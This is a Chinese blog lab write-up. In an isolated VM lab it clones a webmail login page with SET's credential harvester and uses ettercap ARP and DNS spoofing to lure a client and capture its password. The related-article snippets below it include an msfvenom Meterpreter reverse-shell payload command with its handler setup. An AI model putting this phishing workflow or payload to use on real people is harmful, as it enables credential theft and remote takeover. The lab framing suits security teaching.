社工钓鱼网站实验

最新推荐文章于 2024-06-20 14:30:00 发布
最新推荐文章于 2024-06-20 14:30:00 发布
阅读量2.9k 收藏 23
点赞数 4
分类专栏: 网络安全 笔记 文章标签: 网络安全 社会工程学 钓鱼网站
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41084756/article/details/88558708
版权

社会工程学(Social Engineering)
社会工程学是一种通过人际交流的方式获得信息的非技术渗透手段。不幸的是,这种手段非常有效,而且应用效率极高。事实上,社会工程学已是企业安全最大的威胁之一
百度百科
(引自百度百科:社会工程学)

拓扑

拓扑

需求

  1. 某网络拓扑图如图所示,局域网部署两台虚拟机,一台作为攻击者(Hacker),一台作为正常用户(Client)。(PS:若两台均为虚拟机,虚拟机网络模式设为NAT)
  2. Hacker搭建钓鱼网站,以139邮箱登录网站为例:http://mail.10086.cn,以本地IP地址测试钓鱼网站的可用性。
  3. Hacker开启DNS欺骗,使得客户端(Client)访问139邮箱地址解析到的地址为Hacker地址。
  4. Hacker发送警告信息提醒Client,诱骗其登陆139邮箱。
  5. 截获其账户密码。

操作步骤

1.1查看Client(win7)的IP地址和网关
win7
1.2查看kali的IP地址
kali
2.1利用setoolkit社会工程学工具包
setoolkit
1表示社会工程学攻击

2.2 2表示网页攻击
attack

2.3 3表示认证获取攻击,即搭建web,克隆登陆网页,获取认证
web

2.4 2表示简单站点克隆,并输入所克隆站点的存放地址(本机)
cloner

2.5 成功克隆 输入想要克隆的站点URL
URL

2.6 测试克隆结果(127.0.0.1表示访问本机搭建/克隆的web网站)
127.0.0.1
(用靶机访问本机所搭建/克隆的web网站)

web
(靶机站点解析)
站点
3.1 kali站点绑定
绑定
绑定完保存并退出
保存退出

3.2 利用ettercap–执行ARP欺骗嗅探的工具(-G表示打开图形化界面)
ARP
(嗅探模式)
嗅探
(网卡选择)
网卡
(开始嗅探)
开始
(列出局域网内所有存活的主机)
主机
(扫描本网段内所有主机)
扫描
(中间人监听模式,将要监听的目标添加到Target1、Target2中)
T1
T2
(添加成功)
成功
(ARP欺骗)
欺骗
(嗅探并保持原连接状态)
连接
(管理插件)
插件
(DNS欺骗)
DNS
start
(欺诈开始)
欺诈开始

4 靶机ping原网址时其实是被本机克隆的钓鱼网站
ping

5 克隆52zxw、baidu
添加
ping
ping
dns

小结

1.Ettercap 是一个非常强大的中间人攻击工具
2.站点克隆只能简单克隆,一些图片有问题(如二维码,百度的图标等)。

(完成于2019‎年‎1‎月‎18‎日‏‎22:02,于今整理上传)

STARBLOCKSHADOW
关注
  • 4
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
揭秘6种最有效的社会工程学攻击手段及防御之策
weixin_34161064的博客
09-19 1万+
本文讲的是揭秘6种最有效的社会工程学攻击手段及防御之策, 世界第一黑客凯文•米特尼克在《欺骗的艺术》中曾提到,人为因素才是安全的软肋。很多公司在信息安全上投入重金,最终导致数据泄露的原因却在人本身。你可能想象不到,对黑客来说,通过网络远程渗透破解获得数据,可能是最为麻烦的方法。一种无需电脑网络,更注重研究人性弱点的黑客手法正在兴起,这就是社会工程学攻击...
网络钓鱼网站检测:使用神经网络检测网络钓鱼网站实验
02-04
网络钓鱼网站检测:使用神经网络检测网络钓鱼网站实验
ChatGPT在社工攻击和反钓鱼中的应用
最新发布
白帽子凯哥哥的博客
06-20 778
ChatGPT在网络安全领域的发展前景是非常广阔的。它可以帮助识别和应对钓鱼攻击,防范虚假信息的传播,并保护用户和组织的信息和隐私。随着技术的不断发展和改进,ChatGPT将在网络安全领域中发挥更加重要的作用,为用户和组织提供更安全的网络环境。未来,ChatGPT在网络安全领域将会发挥越来越重要的作用。随着人工智能技术的不断发展,ChatGPT模型将会变得更加高效和精确,从而更好地帮助用户识别和应对网络安全威胁。一方面,ChatGPT可以被用于识别和分析钓鱼攻击的新趋势和漏洞。
渗透测试工具-SET工具使用-钓鱼网站实验
qq_44060093的博客
03-16 1700
记一次360实训平台的实验 渗透测试工具-SET工具使用-钓鱼网站实验 实验目的 通过本实验理解社工平台SET的模块组成及功能,掌握利用SET软件配置钓鱼网站的方法与过程,熟悉常见社工场景的安全防护测量。 实验原理 开源的社会工程学利用套件SET,能够支持鱼叉式网络钓鱼攻击、网页攻击、传染媒介式(俗称木马)、建立payloaad和listener、邮件群发攻击、Arduino基础攻击、无线接入点攻...
DNS劫持实验(钓鱼网站)
n5xxxx__zy的博客
05-31 2676
实验环境: 搭建一个目标网站www.wh.com 网卡:192.168.146.2 Win7 (被欺骗的)IP:192.168.146.129 Win2008 (假DNS服务器)IP:192.168.146.130 1、网站搭建 Win2008网卡 2、执行py代码 from scapy.all import * wlan2="VMware Virtua...
制作一个简单的钓鱼网站
weixin_30745553的博客
07-12 8000
制作一个简单的钓鱼网站 实验环境:一台kali虚拟机(用作制作钓鱼网站),NAT模式上网。 一台物理机(就是我的电脑,用作被攻击对象) 首先在kali上打开要使用的工具setoolkit. 接着有6个选项,选择第一个社会工程攻击. 选择社会工程攻击之后接着有11个选项. 选择第二个网站攻击向量. 选择完之后有8个选项。 选择第三个凭证收割攻击方法. 选择完之后有3个选项。 第一个选项是使用...
社工库网站源码
10-08
"社工库网站源码"这个主题涵盖了以下几个关键知识点: 1. **社会工程学**:社会工程学是一种利用人类行为和心理来获取敏感信息的技术,通常在网络安全领域用来模拟攻击者如何通过欺骗、误导或利用人的信任来获取...
搜云社工库网站程序源码
02-05
【标题】"搜云社工库网站程序源码"是一个专用于社工信息查询与管理的网站程序,它提供了一套完整的源代码,允许开发者或安全研究人员深入理解其内部工作原理,同时也为自定义和扩展功能提供了可能性。社工库(Social...
2023-TG免费社工机器人大合集
07-20
2. **电子邮件钓鱼**:社工机器人能生成看似合法的电子邮件,诱使收件人点击恶意链接或附件,从而泄露敏感数据或安装恶意软件。 3. **电话诈骗模拟**:通过语音识别和对话生成技术,机器人可以进行电话通话,模仿...
社工大师软件
12-12
软件不错,就是要登录账号密码,而这个账号密码是需要向官方买的,所以看你喜不喜欢咯
社工库查询系统网站源代码 Vue.js+Flask+MongoDB
07-08
【标题】"社工库查询系统网站源代码 Vue.js+Flask+MongoDB" 涉及的关键技术点包括前端框架Vue.js、后端框架Flask以及数据库管理系统MongoDB。这三个技术是构建现代Web应用程序的核心组件,它们各自扮演着重要的角色...
Kali社工包构造Google钓鱼网站
chaojixiaojingang
08-24 2915
钓鱼攻击简介:        钓鱼攻击是社会工程学攻击的一种方式。钓鱼攻击使用电子邮件或者恶意网站诱骗人们提供个人信息(通常是金融信息)。攻击者可能发出外表看来好像可信赖的信 用卡公司或者金融机构发来的电子邮件,要求用户提供账户信息,理由通常是账户出现了一点问题。当用户根据要求提供自己的信息的时候,攻击者就利用这个信息 访问用户的这个账户。 钓鱼攻击的一般步骤: 1. 钓鱼者入侵初级服务器,窃...
社会工程学实验-一次非正式钓鱼的测试(靶场演示)
易编橙 · 终身成长社群,相遇已是上上签!
12-19 1293
文章目录社会工程学实验-一次非正式钓鱼的测试SET中渗透测试的攻击向量SET中的第三方模块社会工程学攻击 社会工程学实验-一次非正式钓鱼的测试 关于SET:Social-engineering toolkit的缩写,社会工程学工具集。里面包含了许多用于进行社会工程学攻击的工具。 社会工程学 社会工程学通常以交谈、欺骗、假冒或口语等方式,从合法用户中套取用户系统的秘密。熟练的社会工程师都是擅长进行信息收集的身体力行者。很多表面上看起来一点用都没有的信息都会被这些人利用起来进行渗透。比如说一个电话号码,一个人的
DNS欺骗并与Cobalt Strike结合构建钓鱼网站实验
Tranquillity
09-27 974
0x01 实验准备 实验原理: DNS欺骗就是攻击者冒充域名服务器欺骗用户。 利用Cobalt Strike搭建“钓鱼”网站,ettercap工具实现DNS欺骗。在同一局域网内,目标用户访问http://www.icloud.com时,会解析到攻击者IP,即目标用户此时访问的是攻击者克隆的网站。 实验工具: ettercap Cobalt Strike 实验环境: 靶机(Windows) 攻击机(kali,IP:192.168.233.129)并与靶机处于互能ping通状态。 0x02 实验步骤
cs钓鱼实操
2301_76227305的博客
01-24 1343
CS 是Cobalt Strike的简称,是一款渗透测试的神器,通常称为cs。它分为客户端和服务端,服务端一般都安装再kali上面,而客户端则随意。服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。CobaltStrike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。1.学会CS的安装,在客户机和服务端进行不同的命令操作。
社会工程学与APT攻击之——社工邮件钓鱼分析
温柔小薛的博客
04-22 5688
社工邮件钓鱼分析 在大型企业边界安全做的越来越好的情况下,不管是APT攻击还是红蓝对抗演练,钓鱼和水坑攻击被越来越多的应用。(水坑攻击感觉也很牛掰的样子) 说起钓鱼,突然想起来小薛同学在大一收到一个钓鱼邮件,结果还真真实实的上当了哈哈,因为那时候玩英雄联盟很投入,之后突然收到一个幸运召唤师的邮件,做的真的很真,后来学了安全才知道就是最典型的XSS钓鱼。 今天学的更倾向于在企业中的这种社工钓鱼,跟大...
钓鱼网站实施过程
s322936的博客
06-03 2340
网络钓鱼是通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾邮件,意图引诱收信人给出敏感信息(如用户名、口令、帐号 ID 、 ATM PIN 码或信用卡详细信息)的一种攻击方式。最典型的网络钓鱼攻击将收信人引诱到一个通过精心设计与目标组织的网站非常相似的钓鱼网站上,并获取收信人在此网站上输入的个人敏感信息,通常这个攻击过程不会让受害者警觉。这些个人信息对黑客们具有非常大的吸引力,因为这些信息使得他们可以假冒受害者进行欺诈性金融交易,从而获得经济利益。受害者经常遭受显著的经济损失或全部个人信息被窃取并用于犯
社会工程学之钓鱼attack常见手段和方法
weixin_51339377的博客
03-27 1297
1.excel宏钓鱼 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.186 lport=4444 -f msi -o hack.msi msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost=192.168.1.186 show options exploit 将msi粘贴到/var/www/htm..
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值